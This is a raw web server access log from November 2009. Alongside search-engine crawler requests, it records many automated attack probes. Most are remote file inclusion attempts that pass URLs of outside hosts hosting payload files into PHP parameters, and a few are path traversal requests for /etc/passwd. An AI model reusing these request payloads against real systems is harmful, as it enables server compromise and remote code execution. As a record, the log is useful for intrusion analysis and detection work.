65.55.207.131 - - [13/Nov/2009:21:29:24 -0600] "GET /logs/access_log.1193270400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.171.190.107 - - [13/Nov/2009:21:29:55 -0600] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:29:55 -0600] "GET /logs/access_log.1234569600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:30:00 -0600] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:30:05 -0600] "GET /logs/access_log.1253491200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:15 -0600] "GET ///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:15 -0600] "GET /logs///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:15 -0600] "GET /logs/access_log.1251849600///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:26 -0600] "GET /logs/access_log.1253404800///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.107.204 - - [13/Nov/2009:21:31:30 -0600] "GET /logs/access_log.1109376000 HTTP/1.1" 200 354 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
118.107.162.36 - - [13/Nov/2009:21:31:45 -0600] "GET ///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:45 -0600] "GET /logs/access_log.1251849600///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:45 -0600] "GET /logs///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:21:31:53 -0600] "GET /logs/access_log.1253404800///skin/zae_plan/view_foot.php/write.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:27 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:27 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:34 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:37 -0600] "GET /logs/access_log.1251504000//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:37 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:37 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:37 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:38 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:38 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:38 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:41 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:41 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:41 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:41 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:41 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:33:46 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:49 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:49 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:33:49 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.54.35 - - [13/Nov/2009:21:34:07 -0600] "GET /logs/access_log.1251504000//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:34:34 -0600] "GET //setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:34:34 -0600] "GET /logs//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:34:34 -0600] "GET /logs/access_log.1252713600//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:34:44 -0600] "GET /setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:34:44 -0600] "GET /logs/access_log.1250899200/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:34:44 -0600] "GET /logs/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.98.146.166 - - [13/Nov/2009:21:34:56 -0600] "GET /logs/access_log.1250985600/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:35:54 -0600] "GET /setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:35:54 -0600] "GET /logs/access_log.1250899200/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:35:54 -0600] "GET /logs/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.139.66.104 - - [13/Nov/2009:21:36:21 -0600] "GET /logs/access_log.1250985600/setup.php?dir=http://fusiongrafix.net/button2G.jpg?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
141.223.127.150 - - [13/Nov/2009:21:37:08 -0600] "GET /logs/access_log.1251504000//setup.php?setup[use_category]=1&dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.182 - - [13/Nov/2009:21:37:55 -0600] "GET /logs/access_log.1117756800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.110.17 - - [13/Nov/2009:21:39:17 -0600] "GET /logs/access_log.1120521600 HTTP/1.1" 200 3206 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
65.55.109.44 - - [13/Nov/2009:21:41:00 -0600] "GET /logs/access_log.1235088000 HTTP/1.1" 200 140698 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
67.205.67.241 - - [13/Nov/2009:21:47:01 -0600] "GET /logs/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:47:01 -0600] "GET /logs/access_log.1237075200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:47:01 -0600] "GET /send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:47:01 -0600] "GET /logs/access_log.1235779200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:47:20 -0600] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:47:21 -0600] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:47:24 -0600] "GET /logs/access_log.1234569600//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:47:26 -0600] "GET /logs/access_log.1253491200//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.109.191 - - [13/Nov/2009:21:48:55 -0600] "GET /logs/access_log.1134000000 HTTP/1.1" 200 669 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)"
67.205.67.241 - - [13/Nov/2009:21:50:08 -0600] "GET /logs/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:50:08 -0600] "GET /send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:50:08 -0600] "GET /logs/access_log.1235779200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:50:08 -0600] "GET /logs/access_log.1237075200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:29 -0600] "GET /logs/access_log.1249344000///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:29 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:30 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 212726 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:33 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:33 -0600] "GET /logs/access_log.1249344000///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:50:36 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 212726 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:00 -0600] "GET //include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:00 -0600] "GET /logs/access_log.1253577600//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:00 -0600] "GET /logs/access_log.1253664000//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:05 -0600] "GET /logs//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:51:45 -0600] "GET /logs/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:51:45 -0600] "GET /send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:51:45 -0600] "GET /logs/access_log.1235779200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.205.67.241 - - [13/Nov/2009:21:51:45 -0600] "GET /logs/access_log.1237075200/send_reminders.php?includedir=http://www.hireprops.co.uk/sets/thumbs/log/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:46 -0600] "GET //include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:46 -0600] "GET /logs//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:51:46 -0600] "GET /logs/access_log.1253664000//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:52:17 -0600] "GET /logs/access_log.1254268800///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:52:23 -0600] "GET /logs/access_log.1254268800///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:52:24 -0600] "GET /logs/access_log.1250726400///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.199.232.112 - - [13/Nov/2009:21:52:30 -0600] "GET /logs/access_log.1250726400///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:52:38 -0600] "GET /logs//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:52:38 -0600] "GET //include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:52:38 -0600] "GET /logs/access_log.1253577600//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:21:52:38 -0600] "GET /logs/access_log.1253664000//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.109 - - [13/Nov/2009:21:55:55 -0600] "GET /logs/access_log.1191628800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.111.74 - - [13/Nov/2009:21:56:46 -0600] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:56:46 -0600] "GET /logs/access_log.1230422400///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:56:46 -0600] "GET /logs/access_log.1232064000///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:56:46 -0600] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:38 -0600] "GET ///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:38 -0600] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:38 -0600] "GET /logs/access_log.1232064000///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:38 -0600] "GET /logs/access_log.1230422400///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
65.55.110.144 - - [13/Nov/2009:21:57:43 -0600] "GET /logs/access_log.1112486400 HTTP/1.1" 200 334 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
65.55.110.154 - - [13/Nov/2009:21:57:48 -0600] "GET /logs/access_log.1153440000 HTTP/1.1" 200 456 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
64.34.111.74 - - [13/Nov/2009:21:57:51 -0600] "GET /logs/access_log.1248566400//page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:51 -0600] "GET //page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:51 -0600] "GET /logs//page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:54 -0600] "GET /logs//page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:54 -0600] "GET /logs/access_log.1248566400//page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:21:57:54 -0600] "GET //page.php?id=http://babem.net/zfxid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.213.177.58 - - [13/Nov/2009:21:59:09 -0600] "GET /e404.php?DOCUMENT_ROOT=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
74.213.177.58 - - [13/Nov/2009:21:59:09 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
65.55.207.119 - - [13/Nov/2009:21:59:55 -0600] "GET /logs/access_log.1215129600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.98.136.21 - - [13/Nov/2009:22:03:20 -0600] "GET //include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 304 "-""Mozilla/5.0"
82.98.136.21 - - [13/Nov/2009:22:03:20 -0600] "GET /logs//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 309 "-""Mozilla/5.0"
82.98.136.21 - - [13/Nov/2009:22:03:20 -0600] "GET /logs/access_log.1246492800//include/mail.inc.php?skin_board_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:03:21 -0600] "GET /logs/access_log.1253577600//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:03:24 -0600] "GET //include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:03:24 -0600] "GET /logs//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:05:54 -0600] "GET /logs//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:05:54 -0600] "GET /logs/access_log.1253923200//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:05:55 -0600] "GET /logs/access_log.1253577600//include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.171.190.107 - - [13/Nov/2009:22:05:59 -0600] "GET //include/prodler.class.php?sPath=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.213.177.58 - - [13/Nov/2009:22:06:03 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
74.213.177.58 - - [13/Nov/2009:22:06:03 -0600] "GET /e404.php?DOCUMENT_ROOT=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
72.232.167.73 - - [13/Nov/2009:22:10:14 -0600] "GET /index1.php?=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
72.232.167.73 - - [13/Nov/2009:22:10:14 -0600] "GET /index1.php?=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
65.55.207.119 - - [13/Nov/2009:22:10:55 -0600] "GET /logs/access_log.1171238400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.107.162.36 - - [13/Nov/2009:22:12:00 -0600] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:22:12:00 -0600] "GET /logs/access_log.1251244800///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:22:12:01 -0600] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:22:12:09 -0600] "GET /logs/access_log.1249776000///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.232.167.73 - - [13/Nov/2009:22:12:16 -0600] "GET /logs/index1.php?=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
72.232.167.73 - - [13/Nov/2009:22:12:16 -0600] "GET /logs/index1.php?=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
65.55.207.25 - - [13/Nov/2009:22:12:25 -0600] "GET /logs/access_log.1145664000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.115 - - [13/Nov/2009:22:13:02 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.126 - - [13/Nov/2009:22:13:25 -0600] "GET /logs/access_log.1237161600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.107.162.36 - - [13/Nov/2009:22:13:46 -0600] "GET /logs/access_log.1251244800///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:22:13:46 -0600] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.107.162.36 - - [13/Nov/2009:22:13:46 -0600] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.51.115 - - [13/Nov/2009:22:13:56 -0600] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
